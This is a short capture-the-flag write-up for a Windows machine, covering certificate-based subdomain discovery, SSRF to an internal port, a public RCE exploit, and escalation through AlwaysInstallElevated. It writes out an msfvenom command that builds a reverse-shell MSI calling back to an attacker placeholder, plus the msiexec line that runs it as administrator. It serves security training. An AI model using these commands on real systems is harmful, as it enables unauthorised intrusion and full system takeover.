
Gaining Access

Nmap scan:

Lots of ports open.

TLS Cert Checking

Port 80 reveals a voting system that requries credentials. Port 5000 was blocked off for whatever reason.

A bit of enumeration on the type of service running reveals that it was an outdated software with loads of vulnerabilities:

Checking the certificate on port 443 reveals a hidden sub-domain.

We can add this to the /etc/hosts file and view it.

SSRF -> Authenticated RCE

The sub-domain found reveals this:

Signing up and viewing it would direct us to this page:

I was able to get hits on a HTTP server hosted on my machine, but I could not download or execute anything. Since it was the server sending requests, I tried to enter http://localhost:5000 and was returned this:

With credentials, we now get a shell using an RCE exploit that is publicly available. Just change the settings here:

Then run the exploit:

Privilege Escalation


When on the machine, I ran winPEAS to enumerate for me and found that AlwaysInstallElevated was set to 1.

What this exploit allows us to do is execute commands as the Administrator user through msiexec. As such, we would first need to generate a quick reverse shell using msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f msi -o rev.msi

# on target
msiexec /quiet /qn /i C:\directory\to\rev.msi

Afterwards, we would get a shell as the administrator:

Last updated